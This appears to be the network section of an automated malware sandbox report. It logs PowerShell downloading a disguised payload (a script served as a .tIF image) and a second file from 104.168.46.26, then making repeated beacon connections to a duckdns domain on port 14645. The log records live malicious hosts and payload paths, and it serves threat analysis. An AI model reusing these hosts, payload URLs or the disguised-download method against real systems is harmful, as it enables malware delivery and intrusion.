Nov 26, 2024 09:44:47.750663042 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.750708103 CET | 49738 | 80 | 192.168.2.4 | 104.168.46.26
Nov 26, 2024 09:44:47.751538038 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.751652002 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.751708031 CET | 49738 | 80 | 192.168.2.4 | 104.168.46.26
Nov 26, 2024 09:44:47.752367973 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.752625942 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.752677917 CET | 49738 | 80 | 192.168.2.4 | 104.168.46.26
Nov 26, 2024 09:44:47.753257036 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.753887892 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.753937006 CET | 49738 | 80 | 192.168.2.4 | 104.168.46.26
Nov 26, 2024 09:44:47.754178047 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.754836082 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.754883051 CET | 49738 | 80 | 192.168.2.4 | 104.168.46.26
Nov 26, 2024 09:44:47.755036116 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.755254984 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.755300045 CET | 49738 | 80 | 192.168.2.4 | 104.168.46.26
Nov 26, 2024 09:44:47.756427050 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.756777048 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.756803989 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.756824970 CET | 49738 | 80 | 192.168.2.4 | 104.168.46.26
Nov 26, 2024 09:44:47.757011890 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.757056952 CET | 49738 | 80 | 192.168.2.4 | 104.168.46.26
Nov 26, 2024 09:44:47.757900000 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.758421898 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.758471966 CET | 49738 | 80 | 192.168.2.4 | 104.168.46.26
Nov 26, 2024 09:44:47.758577108 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.758591890 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.758636951 CET | 49738 | 80 | 192.168.2.4 | 104.168.46.26
Nov 26, 2024 09:44:47.759507895 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.759819984 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.759871006 CET | 49738 | 80 | 192.168.2.4 | 104.168.46.26
Nov 26, 2024 09:44:47.760359049 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.760375023 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.760416031 CET | 49738 | 80 | 192.168.2.4 | 104.168.46.26
Nov 26, 2024 09:44:47.761276960 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.761394024 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.761460066 CET | 49738 | 80 | 192.168.2.4 | 104.168.46.26
Nov 26, 2024 09:44:47.762130976 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.762229919 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.762283087 CET | 49738 | 80 | 192.168.2.4 | 104.168.46.26
Nov 26, 2024 09:44:47.763000965 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.763355970 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.763411045 CET | 49738 | 80 | 192.168.2.4 | 104.168.46.26
Nov 26, 2024 09:44:47.763880968 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.764384985 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.764441013 CET | 49738 | 80 | 192.168.2.4 | 104.168.46.26
Nov 26, 2024 09:44:47.764779091 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.764991999 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.765047073 CET | 49738 | 80 | 192.168.2.4 | 104.168.46.26
Nov 26, 2024 09:44:47.765706062 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.765719891 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.765772104 CET | 49738 | 80 | 192.168.2.4 | 104.168.46.26
Nov 26, 2024 09:44:47.766566992 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.766877890 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.766927958 CET | 49738 | 80 | 192.168.2.4 | 104.168.46.26
Nov 26, 2024 09:44:47.767426968 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.767597914 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.767641068 CET | 49738 | 80 | 192.168.2.4 | 104.168.46.26
Nov 26, 2024 09:44:47.768321991 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.768824100 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.768870115 CET | 49738 | 80 | 192.168.2.4 | 104.168.46.26
Nov 26, 2024 09:44:47.769196033 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.769383907 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.769429922 CET | 49738 | 80 | 192.168.2.4 | 104.168.46.26
Nov 26, 2024 09:44:47.770095110 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.770427942 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.770473003 CET | 49738 | 80 | 192.168.2.4 | 104.168.46.26
Nov 26, 2024 09:44:47.770972013 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
                                                                            Nov 26, 2024 09:44:47.771579981 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.771625042 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:47.771886110 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.772100925 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.772147894 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:47.772752047 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.772928953 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.772973061 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:47.773632050 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.773968935 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.774024963 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:47.774481058 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.824111938 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:47.929764032 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.929961920 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.930064917 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:47.930105925 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.930120945 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.930171967 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:47.930768967 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.930895090 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.930946112 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:47.931904078 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.932174921 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.932219982 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:47.932585001 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.932821989 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.932868958 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:47.933417082 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.933589935 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.933633089 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:47.934283972 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.934726000 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.934786081 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:47.935368061 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.935380936 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.935436010 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:47.936222076 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.936573029 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.936618090 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:47.937000990 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.937444925 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.937489033 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:47.937839985 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.938560963 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.938611031 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:47.938764095 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.938779116 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.938819885 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:47.939657927 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.940020084 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.940064907 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:47.940491915 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.940651894 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.940700054 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:47.941390991 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.941771030 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.941817999 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:47.942280054 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.942506075 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.942549944 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:47.943188906 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.943201065 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.943248034 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:47.944071054 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.944766998 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.944814920 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:47.945055008 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.945066929 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.945107937 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:47.945852041 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.945867062 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.945909977 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:47.946702957 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.947093010 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.947139025 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:47.947609901 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.947745085 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.947787046 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:47.948486090 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.948797941 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.948842049 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:47.949363947 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.949593067 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.949639082 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:47.950275898 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.950293064 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.950335979 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:47.951167107 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.951690912 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.951766014 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:47.952061892 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.952280045 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.952321053 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:47.952914000 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.953041077 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.953083038 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:47.953799009 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.953969955 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.954014063 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:47.954694986 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.955378056 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.955425024 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:47.955606937 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.955620050 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.955662012 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:47.956526041 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.956671000 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.956718922 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:47.957413912 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.957717896 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.957765102 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:47.958264112 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.958980083 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.959038973 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:47.959175110 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.959395885 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.959439993 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:47.960038900 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.960437059 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.960485935 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:47.960930109 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.961112976 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.961169004 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:47.961808920 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.962102890 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.962155104 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:47.962723970 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.963134050 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.963190079 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:47.963764906 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.963903904 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.963946104 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:47.964665890 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.964677095 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.964710951 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:47.965442896 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.965666056 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.965711117 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:47.966237068 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.967184067 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.967195034 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.967214108 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.967231989 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:47.967308044 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:47.967989922 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:48.011610031 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:48.016836882 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:48.362716913 CET4973914645192.168.2.4192.169.69.26
                                                                            Nov 26, 2024 09:44:48.483082056 CET1464549739192.169.69.26192.168.2.4
                                                                            Nov 26, 2024 09:44:48.483196974 CET4973914645192.168.2.4192.169.69.26
                                                                            Nov 26, 2024 09:44:48.488744974 CET4973914645192.168.2.4192.169.69.26
                                                                            Nov 26, 2024 09:44:48.608779907 CET1464549739192.169.69.26192.168.2.4
                                                                            Nov 26, 2024 09:44:58.938816071 CET1464549739192.169.69.26192.168.2.4
                                                                            Nov 26, 2024 09:44:58.938983917 CET4973914645192.168.2.4192.169.69.26
                                                                            Nov 26, 2024 09:44:58.943083048 CET4973914645192.168.2.4192.169.69.26
                                                                            Nov 26, 2024 09:44:59.063580990 CET1464549739192.169.69.26192.168.2.4
                                                                            Nov 26, 2024 09:44:59.950202942 CET4974014645192.168.2.4192.169.69.26
                                                                            Nov 26, 2024 09:45:00.070489883 CET1464549740192.169.69.26192.168.2.4
                                                                            Nov 26, 2024 09:45:00.072690010 CET4974014645192.168.2.4192.169.69.26
                                                                            Nov 26, 2024 09:45:00.076925039 CET4974014645192.168.2.4192.169.69.26
                                                                            Nov 26, 2024 09:45:00.196919918 CET1464549740192.169.69.26192.168.2.4
                                                                            Nov 26, 2024 09:45:10.456043005 CET1464549740192.169.69.26192.168.2.4
                                                                            Nov 26, 2024 09:45:10.456135988 CET4974014645192.168.2.4192.169.69.26
                                                                            Nov 26, 2024 09:45:10.456367016 CET4974014645192.168.2.4192.169.69.26
                                                                            Nov 26, 2024 09:45:10.578845978 CET1464549740192.169.69.26192.168.2.4
                                                                            Nov 26, 2024 09:45:11.465852022 CET4974314645192.168.2.4192.169.69.26
                                                                            Nov 26, 2024 09:45:11.585983038 CET1464549743192.169.69.26192.168.2.4
                                                                            Nov 26, 2024 09:45:11.588681936 CET4974314645192.168.2.4192.169.69.26
                                                                            Nov 26, 2024 09:45:11.592628956 CET4974314645192.168.2.4192.169.69.26
                                                                            Nov 26, 2024 09:45:11.712730885 CET1464549743192.169.69.26192.168.2.4
                                                                            Nov 26, 2024 09:45:22.004216909 CET1464549743192.169.69.26192.168.2.4
                                                                            Nov 26, 2024 09:45:22.004451990 CET4974314645192.168.2.4192.169.69.26
                                                                            Nov 26, 2024 09:45:22.004451990 CET4974314645192.168.2.4192.169.69.26
                                                                            Nov 26, 2024 09:45:22.124737024 CET1464549743192.169.69.26192.168.2.4
                                                                            Nov 26, 2024 09:45:23.012909889 CET4976914645192.168.2.4192.169.69.26
                                                                            Nov 26, 2024 09:45:23.133491993 CET1464549769192.169.69.26192.168.2.4
                                                                            Nov 26, 2024 09:45:23.133661985 CET4976914645192.168.2.4192.169.69.26
                                                                            Nov 26, 2024 09:45:23.139367104 CET4976914645192.168.2.4192.169.69.26
                                                                            Nov 26, 2024 09:45:23.260698080 CET1464549769192.169.69.26192.168.2.4
                                                                            Nov 26, 2024 09:45:33.642292976 CET1464549769192.169.69.26192.168.2.4
                                                                            Nov 26, 2024 09:45:33.642369032 CET4976914645192.168.2.4192.169.69.26
                                                                            Nov 26, 2024 09:45:33.642573118 CET4976914645192.168.2.4192.169.69.26
                                                                            Nov 26, 2024 09:45:33.762574911 CET1464549769192.169.69.26192.168.2.4
                                                                            Nov 26, 2024 09:45:34.653573990 CET4979514645192.168.2.4192.169.69.26
                                                                            Nov 26, 2024 09:45:34.773487091 CET1464549795192.169.69.26192.168.2.4
                                                                            Nov 26, 2024 09:45:34.773576021 CET4979514645192.168.2.4192.169.69.26
                                                                            Nov 26, 2024 09:45:34.777359962 CET4979514645192.168.2.4192.169.69.26
                                                                            Nov 26, 2024 09:45:34.897430897 CET1464549795192.169.69.26192.168.2.4
                                                                            Nov 26, 2024 09:45:45.143790960 CET1464549795192.169.69.26192.168.2.4
                                                                            Nov 26, 2024 09:45:45.143923044 CET4979514645192.168.2.4192.169.69.26
                                                                            Nov 26, 2024 09:45:45.143991947 CET4979514645192.168.2.4192.169.69.26
                                                                            Nov 26, 2024 09:45:45.263911009 CET1464549795192.169.69.26192.168.2.4
                                                                            Nov 26, 2024 09:45:46.153450966 CET4982114645192.168.2.4192.169.69.26
                                                                            Nov 26, 2024 09:45:46.273484945 CET1464549821192.169.69.26192.168.2.4
                                                                             Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                                                             Nov 26, 2024 09:44:23.633275032 CET | 192.168.2.4 | 1.1.1.1 | 0x9308 | Standard query (0) | 3105.filemail.com | A (IP address) | IN (0x0001) | false
                                                                             Nov 26, 2024 09:44:48.038367033 CET | 192.168.2.4 | 1.1.1.1 | 0xfef | Standard query (0) | nextnewupdationsforu.duckdns.org | A (IP address) | IN (0x0001) | false
                                                                             Nov 26, 2024 09:45:57.653270006 CET | 192.168.2.4 | 1.1.1.1 | 0xc17f | Standard query (0) | nextnewupdationsforu.duckdns.org | A (IP address) | IN (0x0001) | false
                                                                             Nov 26, 2024 09:47:07.622060061 CET | 192.168.2.4 | 1.1.1.1 | 0x7fe2 | Standard query (0) | nextnewupdationsforu.duckdns.org | A (IP address) | IN (0x0001) | false

                                                                             Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                                                             Nov 26, 2024 09:44:23.776446104 CET | 1.1.1.1 | 192.168.2.4 | 0x9308 | No error (0) | 3105.filemail.com | ip.3105.filemail.com | - | CNAME (Canonical name) | IN (0x0001) | false
                                                                             Nov 26, 2024 09:44:23.776446104 CET | 1.1.1.1 | 192.168.2.4 | 0x9308 | No error (0) | ip.3105.filemail.com | - | 193.30.119.205 | A (IP address) | IN (0x0001) | false
                                                                             Nov 26, 2024 09:44:48.358700991 CET | 1.1.1.1 | 192.168.2.4 | 0xfef | No error (0) | nextnewupdationsforu.duckdns.org | - | 192.169.69.26 | A (IP address) | IN (0x0001) | false
                                                                             Nov 26, 2024 09:45:57.977054119 CET | 1.1.1.1 | 192.168.2.4 | 0xc17f | No error (0) | nextnewupdationsforu.duckdns.org | - | 192.169.69.26 | A (IP address) | IN (0x0001) | false
                                                                             Nov 26, 2024 09:47:07.947985888 CET | 1.1.1.1 | 192.168.2.4 | 0x7fe2 | No error (0) | nextnewupdationsforu.duckdns.org | - | 192.169.69.26 | A (IP address) | IN (0x0001) | false
                                                                            • 3105.filemail.com
                                                                            • 104.168.46.26
                                                                             Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                             0 | 192.168.2.4 | 49730 | 104.168.46.26 | 80 | 7492 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

                                                                             Timestamp | Bytes transferred | Direction | Data
                                                                             Nov 26, 2024 09:44:16.287260056 CET | 336 | OUT | GET /1422/bestofthingswithentiretimegivenebstthignstodowithgreat.tIF HTTP/1.1
                                                                            Accept: */*
                                                                            Accept-Encoding: gzip, deflate
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                            Host: 104.168.46.26
                                                                            Connection: Keep-Alive
                                                                             Nov 26, 2024 09:44:17.456748962 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                            Date: Tue, 26 Nov 2024 08:44:17 GMT
                                                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                            Last-Modified: Tue, 26 Nov 2024 04:01:04 GMT
                                                                            ETag: "28b06-627c8e5e96329"
                                                                            Accept-Ranges: bytes
                                                                            Content-Length: 166662
                                                                            Keep-Alive: timeout=5, max=100
                                                                            Connection: Keep-Alive
                                                                            Content-Type: image/tiff
                                                                            Data Ascii: LWuxiobiPGxUrjQ = "GakiGliZHefkizo"cRGKsPZiZWkLknh = "eALLeLRWNfBnWPL"fAzetLeUGNNRAmk = "tNJPiQacShejNpd"LfiUWjKCfCckqxb = "NdZkKzLdPZILUao"hLLLWLLONiKftAu = "dioLNilRKLvxiRn"BkkGckkcHRdahpr = "ZPNbpdZiLZmPWLL"NGPWvKLLPzkuLhZ = "CIKWaWWLfGhZKLh"cUWxWUWoPcZLtCh = "cpxeBtffPzGbmLG"cBWOuiGKWumuKGc = "mhLWGWlocLWkWOh"dlGKbicBcbhmkKu = "KmecmiWxsRQHkLL"peNNZiHiUpBlxez = "qbqxhiPnKKLWGib"RbBeWpjBHiKcxPz = "eGPxNTbWjzGiKkp"LpdPGPKk


                                                                             Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                             1 | 192.168.2.4 | 49738 | 104.168.46.26 | 80 | 8032 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

                                                                             Timestamp | Bytes transferred | Direction | Data
                                                                             Nov 26, 2024 09:44:45.359901905 CET | 78 | OUT | GET /1422/RFGVGF.txt HTTP/1.1
                                                                            Host: 104.168.46.26
                                                                            Connection: Keep-Alive
                                                                             Nov 26, 2024 09:44:46.520169020 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                            Date: Tue, 26 Nov 2024 08:44:46 GMT
                                                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                            Last-Modified: Tue, 26 Nov 2024 03:59:51 GMT
                                                                            ETag: "a0800-627c8e18cb6c8"
                                                                            Accept-Ranges: bytes
                                                                            Content-Length: 657408
                                                                            Keep-Alive: timeout=5, max=100
                                                                            Connection: Keep-Alive
